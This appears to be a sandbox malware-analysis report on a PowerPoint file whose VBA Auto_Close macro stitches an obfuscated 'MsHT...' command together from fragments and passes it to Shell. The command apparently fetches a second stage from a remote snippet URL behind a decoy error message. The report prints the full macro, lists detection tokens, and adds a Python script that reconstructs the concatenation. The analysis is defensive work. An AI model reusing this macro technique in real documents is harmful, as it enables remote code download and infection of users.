Verdict: MALICIOUS (Risk Score 68)

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample is a PowerPoint file containing VBA macros. The Auto_Close entry point (declared as a Function in module "score") builds a command by concatenating the return values of eight helper functions spread across three class modules and passes the result to Shell, after a decoy MsgBox "Error!!!". Only part of that command is recoverable from the extracted source: the modules najma and modern contribute the literal prefix "MsHT", and textfile.T contributes the trailing path "/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal"; the three middle pieces are read from the Tag properties of the UserForm textfilestuff and two of its controls, which are stored with the form's control data rather than in the VBA source and therefore do not appear in the macro listing. The assembled command most likely downloads and executes a second-stage payload from that URL, but the full command line cannot be confirmed from the macro source alone. Whether this entry point fires automatically depends on the container: PowerPoint runs Auto_Open/Auto_Close from add-in files (.ppa/.ppam), not from an ordinary presentation, so the delivery format determines whether the macro runs without user interaction.
Heuristics (3)

- VBA macros detected (medium; 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Close macro (low) [OLE_VBA_AUTOCLOSE]: Auto_Close macro. Matched line in script: `Function Auto_Close()`
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2140 bytes | 471735d407db733fb3cecaf995d91e56dbe263637e4542ddf8a13706e5ac9b50 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "score"
Function Auto_Close()
Dim hi As New textfile
Dim Opera As New najma
Dim textfileforyou As New modern
textfilestuffonly = Opera.X + Opera.Y + textfileforyou.Z + textfileforyou.D + hi.openmarket + hi.XXX + hi.K + hi.T
MsgBox "Error!!!": Call Shell!(textfilestuffonly)
End Function
Attribute VB_Name = "textfile"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function openmarket() As String
openmarket = textfilestuff.mosuf.Tag
End Function
Function XXX() As String
XXX = textfilestuff.Tag
End Function
Function K() As String
K = textfilestuff.stuff.Tag
End Function
Function T() As String
T = "/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal"
End Function
Attribute VB_Name = "najma"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function
Attribute VB_Name = "textfilestuff"
Attribute VB_Base = "0{66F7F502-E35A-4F4A-956F-12A65DC64BC6}{98E14456-6E91-4866-889F-E1E34742E4B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "modern"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function
```
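The two findings above, the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule and the string concatenation inside Auto_Close, can both be reproduced with a short script. The following is an added example written for this page; it is not part of the report, the sandbox, or oletools. It runs offline on a condensed copy of the extracted macro source embedded inline (the Attribute lines and the empty UserForm module are dropped, the strings and identifiers are the ones olevba listed), uses exactly the token lists the heuristic names, and then resolves each term of the concatenation through the `Dim ... As New` aliases and the one-line String functions, inlining literals and leaving every term that reads a UserForm `.Tag` property as a visible placeholder rather than guessing its value.

```python
import re

# Constructed, condensed copy of the macro source listed in this report.
SAMPLE_VBA = '''\
Attribute VB_Name = "score"
Function Auto_Close()
Dim hi As New textfile
Dim Opera As New najma
Dim textfileforyou As New modern
textfilestuffonly = Opera.X + Opera.Y + textfileforyou.Z + textfileforyou.D + hi.openmarket + hi.XXX + hi.K + hi.T
MsgBox "Error!!!": Call Shell!(textfilestuffonly)
End Function
Attribute VB_Name = "textfile"
Function openmarket() As String
openmarket = textfilestuff.mosuf.Tag
End Function
Function XXX() As String
XXX = textfilestuff.Tag
End Function
Function K() As String
K = textfilestuff.stuff.Tag
End Function
Function T() As String
T = "/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal"
End Function
Attribute VB_Name = "najma"
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function
Attribute VB_Name = "modern"
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function
'''

# Token lists as named by the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _has_token(text, token):
    # VBA identifiers are case-insensitive; the lookarounds stop "Shell" from
    # matching inside "ShellExecute" while still matching "Shell!(" (type-suffix call).
    pat = r"(?<![A-Za-z0-9_])" + re.escape(token) + r"(?![A-Za-z0-9_])"
    return re.search(pat, text, re.IGNORECASE) is not None


def autoexec_exec_pairing(text):
    """Return (auto-exec tokens found, exec tokens found) for one VBA stream."""
    auto = [t for t in AUTOEXEC_TOKENS if _has_token(text, t)]
    exe = [t for t in EXEC_TOKENS if _has_token(text, t)]
    return auto, exe


def is_flagged(text):
    """The rule fires only when both token classes co-occur in the stream."""
    auto, exe = autoexec_exec_pairing(text)
    return bool(auto) and bool(exe)


MODULE_RE = re.compile(r'Attribute VB_Name = "([^"]+)"')
STRFUNC_RE = re.compile(r"Function (\w+)\(\) As String[ \t]*\r?\n[ \t]*"
                        r"\1 = ([^\r\n]+?)[ \t]*\r?\n[ \t]*End Function")
ALIAS_RE = re.compile(r"Dim (\w+) As New (\w+)")
CONCAT_RE = re.compile(r"^[ \t]*(\w+) = ((?:\w+\.\w+[ \t]*\+[ \t]*)+\w+\.\w+)[ \t]*$", re.M)


def index_string_functions(text):
    """Map (module, function) -> the expression a one-line String function returns."""
    table = {}
    pieces = MODULE_RE.split(text)          # ['', name1, body1, name2, body2, ...]
    for name, body in zip(pieces[1::2], pieces[2::2]):
        for m in STRFUNC_RE.finditer(body):
            table[(name.lower(), m.group(1).lower())] = m.group(2).strip()
    return table


def reconstruct_concatenations(text):
    """Resolve every `var = a.f + b.g + ...` line term by term.

    Literals are inlined; a term whose function returns anything else (here the
    .Tag properties of UserForm controls, which are not in the VBA source) is
    kept as <expr> so the unrecoverable gap stays visible instead of being guessed.
    """
    aliases = {a.lower(): c.lower() for a, c in ALIAS_RE.findall(text)}
    funcs = index_string_functions(text)
    commands = {}
    for var, rhs in CONCAT_RE.findall(text):
        parts = []
        for term in re.split(r"[ \t]*\+[ \t]*", rhs):
            obj, member = term.split(".", 1)
            expr = funcs.get((aliases.get(obj.lower(), obj.lower()), member.lower()))
            if expr is None:
                parts.append("<%s unresolved>" % term)
            elif len(expr) >= 2 and expr[0] == expr[-1] == '"':
                parts.append(expr[1:-1])
            else:
                parts.append("<%s>" % expr)
        commands[var] = "".join(parts)
    return commands


if __name__ == "__main__":
    print("flagged:", is_flagged(SAMPLE_VBA), autoexec_exec_pairing(SAMPLE_VBA))
    for var, cmd in reconstruct_concatenations(SAMPLE_VBA).items():
        print(var, "=", cmd)
```

Run against the embedded source, the pairing check reports Auto_Close together with Shell, and the reconstruction yields `MsHT<textfilestuff.mosuf.Tag><textfilestuff.Tag><textfilestuff.stuff.Tag>/!api/2.0/snippets/.../files/orignalfinal`: the three placeholders mark exactly the pieces that must be pulled from the form's control data (or observed at run time in a sandbox) before the command line can be confirmed.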